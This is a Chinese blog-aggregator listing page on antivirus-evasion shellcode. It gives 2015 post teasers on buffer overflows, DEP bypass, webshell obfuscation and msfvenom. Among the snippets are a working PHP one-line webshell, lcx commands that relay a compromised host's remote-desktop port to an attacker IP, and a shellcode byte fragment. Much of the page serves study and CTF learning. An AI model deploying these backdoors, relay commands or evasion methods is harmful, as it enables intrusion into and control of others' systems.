免杀Shellcode

如何编写一个shellcode

ShellCode的编写就是将函数或变量在内存中的间接地址改为函数或变量在内存中的直接地址,直接调用!
·2015-11-06 07:28

主动嗅探器sniffact出炉

~任何想找的信息,只要你能分析因为专业课需要,我在做一个对联创进行重放攻击的程序时发现,底层嗅探部分已成套路,每次做重放攻击都要重新实现十分繁琐,而且C/C++虽然方便操作底层,但进行着些简单的操作未免杀鸡用牛刀
·2015-11-03 21:57

meterpreter

这促使我决定一窥meterpreter的究竟,以了解其工作原理和流程,从而方便自定义载荷进行免杀,或者予以改造做远控。后来发现,直
·2015-11-03 21:35

20135302、20135315、20135323----缓冲区溢出漏洞实验(修改版)

本次实验由20135302魏静静、20135315宋宸宁完成shellcode相关内容,20135323符运锦完成后期跟进学习及博客的编写一、实验简介缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统
20135323符运锦·2015-11-03 13:00

源码免杀笔记

最近没什么心情写博客,似乎停止不前了,唉,越来越懒了,不知道怎么回事,整理以前的笔记,这个免杀的,不知道内容过时了没。 各个杀毒软件查杀特点不一样,大致总结以下,API函数,字符串,代码段,资源段。
·2015-11-02 18:14

Windows Embedded CE 6.0 Internals (4) The Mechanism of API

现在的CE是不是不堪一击,用户态进程无意的操作是否就能让系统Crash,或者几行Shellcode就能瓦解它的安全体系? 这个问题让我想起来前几天看到的新闻,关于Windows桌面操作
·2015-11-02 14:16

lcx源代码以及免杀的研究

之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软。顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下。
·2015-11-02 14:04

江民杀毒软件KV2008 正式版下载

全新研发推出的计算机反病毒与网络安全防护软件,是全球首家具有灾难恢复功能的智能主动防御杀毒软件.江民杀毒软件KV2008采用了新一代智能分级高速杀毒引擎,占用系统资源少,扫描速度得到了大幅提升,突破了“灾难恢复”和 “病毒免杀
·2015-11-02 09:55

【CTF】逆向基础2

DEP的一个思路,顾名思义是利用系统中已经存在的系统函数来构造对DEP的攻击,思路大概有三种,通过ZwSetInformationProcess函数将DEP关闭、通过VirtualProtect函数将shellcode
·2015-11-01 10:46

网页解密

其实,网页脚本加密一般是用于网页木马的免杀,一般来说入侵者成功取得Webshell权限以后就会对整个网站进行批量挂马,其中挂马的语句大多是“iframe”,也有些为了隐蔽会插入Flash(geturl)
·2015-11-01 09:11

DEP相关

其基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。
·2015-11-01 08:33

病毒木马凶猛啊!

还有盗QQ号码的所谓免杀木马,倒 N个IEXPLORE.EXE不停的启动,出错误,连接某些IP。TEMP目录下生成1.exe,2.exe.......症状太多了。
·2015-10-31 11:53

win7下new出的内存默认是无执行权限的

win7下new出的内存默认是无执行权限的,需要手动设置: PBYTE pBuff = new BYTE[sizeof(g_shellcode)];DWORD dwTemp;//内存属性VirtualProtect
·2015-10-31 10:06

shellcode

Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。 另外,Shellcode一般是作为数据发送给受攻击服务的。
·2015-10-31 10:12

shellcode

Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。 另外,Shellcode一般是作为数据发送给受攻击服务的。
·2015-10-31 10:12

Dadong's JSXX 0.39 VIP所用shellcode调试

标 题: 【原创】Dadong's JSXX 0.39 VIP所用shellcode调试作 者: promised(ID注册时打错了
·2015-10-31 10:25

[PSTZine_0x01]

id=dfr6h9bk_6j7mmzzhk 0x02 An improvement on mixed case alphanumeric shellcode decoderhttp://docs.g
·2015-10-31 09:45

什么是exploit Vulnerability 和 Shellcode

国内对 exploit vulnerability以及 shellcode没有一个很好的解释,今天看到老外的一篇文章,写的不错。
·2015-10-31 09:28

lcx.exe内网转发命令教程 + LCX免杀下载

  作者: 小健   本机: lcx -listen 2222 3333 2222为转发端口,3333为本机任意未被占用的端口 肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口 3389连接时格式 12
·2015-10-30 15:44

sprintf缓冲区溢出

这段代码的shellcode是抄的别人的,仅仅显示出一个msgbox提醒一下。
·2015-10-28 08:17

一句话木马的免杀

在入侵过程中,我们常常会遇到这样的问题,因为大马太大,而不能上传,怎么办,这个时候就只能用小马来辅助,但是,小马的语句又被杀,今天我们来说说一句话小马的免杀方法。
·2015-10-27 15:13

XSS 跨站攻击

对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。
·2015-10-27 15:38

汇编64讲(搞免杀、破解必看)在线观看

下载地址(也可以在线观看) mms://221.11.20.228/hbywjjk/1/000.asf mms://221.11.20.228/hbywjjk/2/000.asf mms://221.11.20.228/hbywjjk/3/000.asf mms://221.11.20.228/hbywjjk/4/000.asf mms://221.11.20.228/hbywjjk/5
·2015-10-27 14:02

通过getelement定位XSS SHELLCODE

      今天跟AMXSA在弄一个XSS的时候就讨论到,字符长度限制了70个,该XSS是出现在 <img src="xsscode"> , 后来他说对方过滤了 < > " ' 这样 只能有限的调用。 开始我建议他 多弄几个 <img  然后 代码分别写在不同的 
·2015-10-24 09:16

C++调用python

本文在util.h中实现三个函数:1.init_log:用googlelog(glog)初始化log2.exe_command:由C++执行shellcode3.exe_py:C++调用python文件
abcjennifer·2015-10-24 03:00

msfvenom 简介

信很多人升级最新的msf后找不到自己曾经熟悉的msfpayload了(所以说喜欢收集shellcode是一件好事),没错我特么的也找不到了。其实可以use到自己要使用的payload,然后制作。
bazhinv·2015-10-23 11:29

msfvenom 简介

信很多人升级最新的msf后找不到自己曾经熟悉的msfpayload了(所以说喜欢收集shellcode是一件好事),没错我特么的也找不到了。其实可以use到自己要使用的payload,然后制作。
bazhinv·2015-10-23 11:29

msfvenom 简介

信很多人升级最新的msf后找不到自己曾经熟悉的msfpayload了(所以说喜欢收集shellcode是一件好事),没错我特么的也找不到了。其实可以use到自己要使用的payload,然后制作。
bazhinv·2015-10-23 11:29

关于php一句话免杀的分析<>

一开始想这样:   <?php $_GET['ts7']($_POST['cmd']);?> 客户端用菜刀,密码cmd,url为test.php?ts7=assert   这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert   可以都用post:     <?php $_POST['ts7']($_POS
·2015-10-23 08:57

Armadillo穿山甲进阶(2009-04-13 23:14:36)

blog.sina.com.cn/s/blog_5f5742340100ctf6.htmlArmadillo穿山甲进阶 (2009-04-13 23:14:36) 标签: 杂谈  分类: 脱壳破解免杀
·2015-10-23 08:26

免杀修改特征码需要掌握的汇编知识

一.机械码,又称机器码 Ultraedit打开,编辑exe文件时你会看到许许多多的由0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F组成的数码,这些数码就是机器码。修改程序时必须通过修改机器码来修改exe文件。 二.需要熟练掌握的全部汇编知识 不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了。 cmp a,b 比较a与b。 mov a,b 把b的
·2015-10-23 08:05

shellter介绍

首先需要获取一个正常的Windowsexe可执行文件,然后它会将shellcode添加进去,这样就可以成功地修改这个文件并且使其绕过反病毒软件的监测了。
bazhinv·2015-10-22 14:19

shellter介绍

首先需要获取一个正常的Windowsexe可执行文件,然后它会将shellcode添加进去,这样就可以成功地修改这个文件并且使其绕过反病毒软件的监测了。
bazhinv·2015-10-22 14:19

【Writeup】TSCTF Shellcode 300pt

题目考察的实在不能再简单,不过作为shellcode编写的入门还是有意义的。
·2015-10-21 13:32

关于shellcode

  每次听到shellcode,都有点懵,做如下简单了解,虽然还是不是很清楚,深入学习会有很多东西,先记下这些吧。 1、什么是shellcode?   
·2015-10-21 13:37

security cookie

在微软的c/c++ 编译器中,增加了对于栈溢出进行检测的参数 “/GS”,在调试shellcode 的时候,发现vs2005 产生的code 和 vc6 产生的code 有些不同,才让我注意到这个问题。
·2015-10-21 12:26

缓冲区溢出的两种方式

两种覆盖方式:①用任意字符覆盖缓冲区和ebp,eip覆盖成“jmp esp”的地址,而后跟shellcode,这中方式适合于比较小的缓冲区和shellcode, 过长的shellcode将失败。
·2015-10-21 11:46

缓冲区溢出的两种方式

两种覆盖方式:①用任意字符覆盖缓冲区和ebp,eip覆盖成“jmp esp”的地址,而后跟shellcode,这中方式适合于比较小的缓冲区和shellcode, 过长的shellcode将失败。
·2015-10-21 11:45

myShellcode

#include <stdio.h> //#include <WINDOWS.H> #include <string.h> void main(int argc, char **argv) { _asm { push ebp //压入ebp mov ebp,esp su
·2015-10-21 11:23

SQL语句直接开启3389

大家在渗透MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启3389。
·2015-10-21 11:21

netcat 及其姐妹工具

可以用netcat clone 工具CryptCat,支持ssh,还免杀。 查询了一下,netcat还有很多功能更强的clone工具。
·2015-10-21 10:34

端口复用技术

绿盟的san的一篇的文章介绍了渗透防火墙的shellcode,有兴趣的朋友可以参考一下:h
·2015-10-21 10:43

缓冲区溢出漏洞攻击演示实验

定位RET寻找跳转指令地址构造shellcode定位shellcode存放位置编写攻击程序实验环境:攻击主机:系统环境:windows732bit攻击程序开发环境:vc++6.0虚拟机:VMwar
Mr_buffoon·2015-10-07 09:31

一个简单的PE感染病毒

/*----------2015-09-28Update----------*/将shellcode多线程执行使用CreateThread函数开辟子线程子线程会开辟新的堆栈,需要进行新的压栈和函数寻找#
GVFDBDF·2015-09-22 23:00

未知攻焉知防 — Webshell变形技术集锦-20150917

0x1:利用字符串变形技术改变隐秘特征码传统的shell免杀方式,利用字符串函数以及字符串操作符,将字符串进行多次分割、编码、变形后再组装成后门代码然后调用执行.简单的字符串变形这段代码将"evalrequest
qq_27446553·2015-09-21 09:47

未知攻焉知防 — Webshell变形技术集锦-20150917

0x1:利用字符串变形技术改变隐秘特征码传统的shell免杀方式,利用字符串函数以及字符串操作符,将字符串进行多次分割、编码、变形后再组装成后门代码然后调用执行.简单的字符串变形 这段代码将"evalrequest
qq_27446553·2015-09-21 09:00

shellcode基础(1)

题目:已知以下是我写得一串x86二进制指令码,可以将其加载并运行。charbuff[]={"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30""\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff""\x31\xc0\xac\x3c\x61\x7c\x02\x
GVFDBDF·2015-09-16 20:00

缓冲区溢出分析第05课:编写通用的ShellCode

前言我们这次的实验所要研究的是如何编写通用的ShellCode。可能大家会有疑惑,我们上次所编写的ShellCode已经能够很好地完成任务,哪里不通用了呢?
ioio_jy·2015-09-09 14:50

缓冲区溢出分析第05课:编写通用的ShellCode

    《缓冲区溢出分析》这一系列的内容是我为“i春秋”(www.ichunqiu.com)所录制的同名视频课程的讲稿汇总。每次我都是在写完课程的文档后,再依据文档内容进行课程的讲解。而本系列的内容也是从零开始,来给大家由浅入深地进行缓冲区溢出漏洞的讲解。整个课程是理论与实践相结合,每讲完几个基础理论后,都会配以实际的软件中的漏洞进行分析,以帮助大家更好地理解漏洞的原理。有兴趣的朋友可以结合本文与
ioio_jy·2015-09-09 14:00

缓冲区溢出分析第04课:ShellCode的编写

    《缓冲区溢出分析》这一系列的内容是我为“i春秋”(www.ichunqiu.com)所录制的同名视频课程的讲稿汇总。每次我都是在写完课程的文档后,再依据文档内容进行课程的讲解。而本系列的内容也是从零开始,来给大家由浅入深地进行缓冲区溢出漏洞的讲解。整个课程是理论与实践相结合,每讲完几个基础理论后,都会配以实际的软件中的漏洞进行分析,以帮助大家更好地理解漏洞的原理。有兴趣的朋友可以结合本文与
ioio_jy·2015-09-09 14:00
上一页 33 34 35 36 37 38 39 40 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他